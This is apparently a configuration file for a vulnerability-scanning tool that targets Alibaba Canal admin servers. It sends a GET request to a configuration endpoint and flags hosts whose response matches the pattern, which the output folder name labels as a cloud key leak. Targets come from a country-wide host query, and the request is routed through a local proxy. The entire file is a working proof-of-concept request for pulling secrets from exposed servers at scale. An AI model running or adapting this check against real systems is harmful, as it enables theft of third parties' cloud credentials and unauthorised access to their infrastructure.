targetPath: /api/v1/canal/config/1/0
targetMethod: get
targetTimeout: 2
targetProfixs:
    http: 127.0.0.1:7890
targetAllowRedirects: false
targetHeaders:
targetJson:
targetData:
targetReExpression:
    respStatusCode: 200
    respBody: \"code\"\s*:\s*20000
targetDir: ../countryQueryResult/
targetOutputDir: ../2CVE漏洞POC目标/canal云密钥泄漏/
targetRestText: True